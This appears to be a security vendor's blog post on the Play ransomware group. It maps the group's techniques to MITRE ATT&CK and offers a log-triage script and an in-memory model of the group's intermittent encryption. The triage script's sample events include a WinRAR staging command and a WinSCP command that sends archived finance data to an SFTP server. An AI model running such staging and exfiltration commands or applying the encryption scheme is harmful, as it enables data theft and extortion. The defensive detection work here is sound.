Play Ransomware Analysis, Simulation and Mitigation - CISA Alert AA23-352A


On December 18, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Play ransomware [1]. The Play ransomware group first appeared in June 2022 and has since compromised roughly 300 organizations worldwide. Play operators exploit known vulnerabilities in exposed services and follow current ransomware trends such as double extortion and inhibiting system recovery.

In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Play ransomware and how organizations can defend themselves against Play ransomware attacks.

Play Ransomware

Play ransomware, also known as PlayCrypt, was first observed in late June 2022. The group targets organizations in Australia, Latin America, Europe, and the United States. Because the group is financially motivated rather than sector-specific, its victims come from a wide range of industries, including education, healthcare, insurance, media, technology, and telecommunications.

For initial access, the group relies on known vulnerabilities in public-facing assets and on compromised valid accounts. Once inside, the operators combine custom malware with open-source and commodity tools such as AdFind and BloodHound (Active Directory discovery), WinPEAS and Mimikatz (privilege escalation and credential access), GMER (disabling security software), and Cobalt Strike (command and control and lateral movement). Play follows current ransomware trends and shares tactics with other recent groups such as Hive and Nokoyawa. The payload uses an intermittent encryption scheme keyed to file size, encrypting chunks of 0x100000 (1,048,576) bytes rather than whole files. In addition to encrypting files, Play operators steal sensitive data and threaten to publish it on their leak site if the ransom is not paid.

Although it is a relatively new player in the ransomware scene, the Play ransomware group already poses a significant threat to organizations. In their advisory, CISA recommends that organizations continuously validate their security controls against Play ransomware variants and the group's evolving tools and techniques.

Play Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1078 Valid Accounts

Play ransomware operators use compromised valid accounts to gain initial access to the target network. Credentials stolen or purchased elsewhere and passwords reused across multiple services are the likely sources of these compromised accounts.

T1133 External Remote Services

Play ransomware threat actors use publicly exposed RDP and VPN servers to establish a foothold in the target network. The compromised valid accounts described above are what they log in with over these RDP and VPN services.

T1190 Exploit Public-Facing Application

Play ransomware exploits critical vulnerabilities in public-facing assets for initial access. The group is known to exploit the Microsoft Exchange ProxyNotShell chain (CVE-2022-41040 and CVE-2022-41082) and the related OWASSRF chain (CVE-2022-41080 with CVE-2022-41082), as well as the FortiOS vulnerabilities CVE-2018-13379 and CVE-2020-12812.

Discovery

T1016 System Network Configuration Discovery & T1518.001 Software Discovery: Security Software Discovery

After gaining initial access, the adversaries use AdFind to enumerate the victim's Active Directory. They also deploy Grixba, a custom information-stealer and network scanner, to enumerate users and computers in the domain. In its scan mode, Grixba queries hosts over WMI, WinRM, and Remote Registry to determine which software is installed, and it specifically looks for antivirus products, EDR suites, and backup tools.

Defense Evasion

T1562.001 Impair Defenses: Disable or Modify Tools

Play ransomware actors disable the security software identified during discovery using otherwise legitimate tools such as GMER, IOBit, and PowerTool.

T1070.001 Indicator Removal: Clear Windows Event Logs

Play ransomware actors delete Windows Event logs to hide their tracks and prevent defenders from investigating the ransomware incident.

Credential Access

T1552 Unsecured Credentials

Adversaries search for unsecured credentials to elevate their privileges or move laterally in the compromised network.

T1003 OS Credential Dumping 

Play ransomware threat actors use Mimikatz to dump credentials and view Kerberos tickets. Moreover, they use Mimikatz to add accounts to domain controllers and gain domain administrative access.

Lateral Movement

T1570 Lateral Tool Transfer 

The Play ransomware group brings in tools like Cobalt Strike, SystemBC, and PsExec to support lateral movement and remote file execution across the victim's network.

Collection

T1560.001 Archive Collected Data: Archive via Utility

Before exfiltration, the adversaries compress the victim's files with WinRAR and split the archives into multiple volumes.

Exfiltration

T1048 Exfiltration Over Alternative Protocol

WinSCP is a free, open-source file transfer client for Windows that speaks SCP and SFTP over SSH. Play actors use it to push the staged archives to adversary-controlled servers, so the transfer is encrypted in transit and blends in with legitimate administrative SSH traffic rather than using the group's command-and-control channel.
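The three post-compromise behaviors above (clearing event logs, staging data as WinRAR split archives, and moving it out with WinSCP) leave process-creation and log-management events that can be triaged together. The following is an added example, not code from the advisory or from Picus: it runs simple rules over constructed Windows event records (IDs 1102 and 104 for a cleared log, 4688 for process creation with command-line auditing enabled). The host names, account names, paths, the 203.0.113.10 address, and the regexes are all assumptions of this example, not vendor signatures.

```python
"""
Triage of Windows event records for three Play TTPs: clearing event logs
(T1070.001), staging data as WinRAR split archives (T1560.001) and moving
it out with WinSCP over SFTP/SCP (T1048).

Added example. The events are constructed to resemble Security/System log
entries; the rules are example heuristics, not signatures from CISA or Picus.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Event:
    channel: str          # "Security" or "System"
    event_id: int
    host: str
    user: str
    fields: dict = field(default_factory=dict)


# Constructed sample telemetry. 203.0.113.10 is a documentation-range address.
SAMPLE_EVENTS = [
    Event("Security", 4688, "FS01", r"CORP\svc_backup", {
        "NewProcessName": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"}),
    Event("Security", 4688, "FS01", r"CORP\svc_backup", {
        "NewProcessName": r"C:\Program Files\WinRAR\Rar.exe",
        "CommandLine": r'Rar.exe a -v500m -hpSecret123 C:\Temp\stage\finance.rar "D:\Shares\Finance"'}),
    Event("Security", 4688, "FS01", r"CORP\svc_backup", {
        "NewProcessName": r"C:\Temp\tools\WinSCP.exe",
        "CommandLine": r'WinSCP.exe /command "open sftp://upload@203.0.113.10/" "put C:\Temp\stage\*.rar /in/" "exit"'}),
    Event("Security", 1102, "DC01", r"CORP\Administrator"),
    Event("System", 104, "DC01", r"CORP\Administrator", {"Channel": "Security"}),
]


def _proc(e: Event, image_re: str, cmd_re: str) -> bool:
    """4688 event whose image matches image_re and whose command line matches cmd_re."""
    return (e.event_id == 4688
            and re.search(image_re, e.fields.get("NewProcessName", ""), re.I) is not None
            and re.search(cmd_re, e.fields.get("CommandLine", ""), re.I) is not None)


RULES = [
    ("T1070.001", "Windows event log cleared",
     lambda e: (e.channel, e.event_id) in {("Security", 1102), ("System", 104)}),
    ("T1560.001", "WinRAR archive split into volumes (-v<size>)",
     lambda e: _proc(e, r"\\(win)?rar\.exe$", r"\s-v\d+[kmgb]?\b")),
    ("T1048", "WinSCP transfer to an SFTP/SCP endpoint",
     lambda e: _proc(e, r"\\winscp\.(exe|com)$", r"\b(sftp|scp)://")),
]


def triage(events):
    """Return one (technique, description, host, user, detail) tuple per rule hit."""
    hits = []
    for e in events:
        for technique, desc, pred in RULES:
            if pred(e):
                detail = e.fields.get("CommandLine") or e.fields.get("Channel", "")
                hits.append((technique, desc, e.host, e.user, detail))
    return hits


def technique_ids(events):
    """Sorted, de-duplicated ATT&CK IDs seen in the event set."""
    return sorted({h[0] for h in triage(events)})


def escalate(events) -> bool:
    """Play stages (T1560.001), exfiltrates (T1048) and then covers its tracks
    (T1070.001); seeing all three together warrants an incident, not a ticket."""
    return {"T1560.001", "T1048", "T1070.001"} <= set(technique_ids(events))


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(" | ".join(map(str, hit)))
    print("escalate:", escalate(SAMPLE_EVENTS))
```

The rules key on the executable name and a distinctive switch or URI scheme rather than on hashes, because the attackers bring their own copies of these legitimate tools. Note that the 4688 rules only work if "Include command line in process creation events" is enabled in the audit policy; without it, the CommandLine field is empty and only the 1102/104 rule fires.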

Impact

T1486 Data Encrypted for Impact

Play ransomware encrypts files with a hybrid RSA-AES cryptosystem: file contents are encrypted with AES and the AES key material is wrapped with RSA, so decryption requires the operators' RSA private key. Encrypted files receive the .play extension.

The payload does not encrypt whole files. It encrypts fixed chunks of 0x100000 bytes (1 MiB), and the number of chunks depends on the file size: two chunks for files smaller than 1 GB, three for files between 1 GB and 10 GB, and five for files larger than 10 GB. For a 10 GB file that is at most 5 MiB of ciphertext, which is enough to corrupt most file formats but leaves the file looking almost entirely like plaintext to any detection logic that judges encryption by whole-file entropy.
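To make the size thresholds concrete and show why whole-file entropy is the wrong detector for this scheme, here is an added example (not Play's code and not from the advisory). The chunk size and the 2/3/5 thresholds come from the text above; everything else is an assumption of the example: the chunks are placed evenly across the file (the page does not say where Play puts them), random bytes stand in for AES ciphertext, and the sample "document" is constructed.

```python
"""
Model of Play's size-based intermittent encryption and a windowed entropy check.

Constants come from the page: 0x100000-byte chunks, 2 chunks below 1 GB,
3 below 10 GB, 5 above. Chunk placement and the random-byte stand-in for
ciphertext are assumptions of this added example, not facts about Play.
"""
import math
import os

CHUNK = 0x100000           # 1 MiB, per the page
GIB = 1 << 30


def chunk_count(size: int) -> int:
    """How many 1 MiB chunks Play encrypts for a file of `size` bytes."""
    if size < GIB:
        return 2
    if size < 10 * GIB:
        return 3
    return 5


def chunk_offsets(size: int) -> list:
    """Assumed placement (not from the page): first chunk at offset 0, last chunk
    ending at EOF, any others evenly spaced between them."""
    n = chunk_count(size)
    if size <= CHUNK:
        return [0]
    step = (size - CHUNK) // (n - 1)
    return [i * step for i in range(n)]


def encrypted_fraction(size: int) -> float:
    """Share of the file that is actually ciphertext under this model."""
    covered, prev_end = 0, 0
    for off in chunk_offsets(size):
        start, end = max(off, prev_end), min(off + CHUNK, size)
        if end > start:
            covered += end - start
            prev_end = end
    return covered / size


def simulate_play_encrypt(plaintext: bytes) -> bytes:
    """Overwrite the modelled chunks with random bytes (stand-in for AES output)."""
    buf = bytearray(plaintext)
    for off in chunk_offsets(len(buf)):
        end = min(off + CHUNK, len(buf))
        buf[off:end] = os.urandom(end - off)
    return bytes(buf)


def _entropy(hist, total: int) -> float:
    """Shannon entropy in bits per byte from a 256-bin histogram."""
    return -sum((c / total) * math.log2(c / total) for c in hist if c)


def analyse(buf: bytes, window: int = 64 * 1024, threshold: float = 7.5) -> dict:
    """Whole-file entropy versus the hottest fixed-size window.

    The window is smaller than Play's 1 MiB chunk so that at least one window
    lies entirely inside any chunk, wherever that chunk starts."""
    total = [0] * 256
    hottest = 0.0
    for i in range(0, len(buf), window):
        part = buf[i:i + window]
        hist = [part.count(b) for b in range(256)]
        hottest = max(hottest, _entropy(hist, len(part)))
        total = [t + h for t, h in zip(total, hist)]
    whole = _entropy(total, len(buf))
    return {
        "whole_file_entropy": round(whole, 2),
        "max_window_entropy": round(hottest, 2),
        "whole_file_flags": whole >= threshold,
        "windowed_flags": hottest >= threshold,
    }


def demo(size: int = 8 * CHUNK) -> dict:
    """Constructed 8 MiB low-entropy 'document', then the modelled attack on it."""
    text = b"Quarterly revenue report - CONFIDENTIAL - do not distribute. "
    plain = (text * (size // len(text) + 1))[:size]
    return analyse(simulate_play_encrypt(plain))


if __name__ == "__main__":
    for size in (100 * 1024 * 1024, GIB, 20 * GIB):
        print(f"{size:>12} bytes: {chunk_count(size)} chunks, "
              f"{encrypted_fraction(size):.4%} encrypted")
    print(demo())
```

On the 8 MiB sample only a quarter of the bytes are ciphertext, so the whole-file entropy stays in the plaintext range while several 64 KiB windows sit at roughly 8 bits per byte; for a 1 GB file the encrypted share drops to about 0.3%, and for 20 GB to about 0.02%, which is why a per-file entropy threshold never fires on large files. A canary-file or EDR heuristic for this family therefore has to look at windows (or at write patterns) rather than at the file as a whole.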

Figure 1: Example of a null file encrypted with Play ransomware [2]

How Does Picus Help Simulate Play Ransomware Attacks?

We also strongly suggest simulating Play ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Complete Security Validation Platform. With a 14-day free trial of the Picus Platform, you can also test your defenses against hundreds of other ransomware variants, such as AvosLocker, MedusaLocker, and Akira, within minutes.

Picus Threat Library includes the following threats for Play ransomware:

Threat ID | Threat Name                     | Attack Module
95549     | Play Ransomware Campaign 2022   | Windows Endpoint
28161     | Play Ransomware Download Threat | Network Infiltration
38463     | Play Ransomware Email Threat    | Email Infiltration (Phishing)

Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures that address Play ransomware and other ransomware attacks in preventive security controls. Picus Labs has currently validated the following signatures for Play ransomware:

Security Control | Signature ID | Signature Name
Check Point NGFW | 0C7AB166B    | Trojan.Win32.HEUR:Trojan-Ransom.TC.78a9Srdg
Cisco FirePower  |              | W32.Auto:762bb8.in03.Talos
Forcepoint NGFW  |              | File_Malware-Blocked
Fortigate AV     | 10106192     | W32/Filecoder.PLAY!tr.ransom
McAfee           | 0x4840c900   | MALWARE: Malicious File Detected by GTI
Palo Alto        | 584061252    | Ransom/Win32.play.n


Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Complete Security Validation Platform.

References

[1] "#StopRansomware: Play Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a. [Accessed: Dec. 19, 2023]

[2] A. Milenkoski, "Crimeware Trends," SentinelOne, Sep. 08, 2022. Available: https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/. [Accessed: Dec. 19, 2023]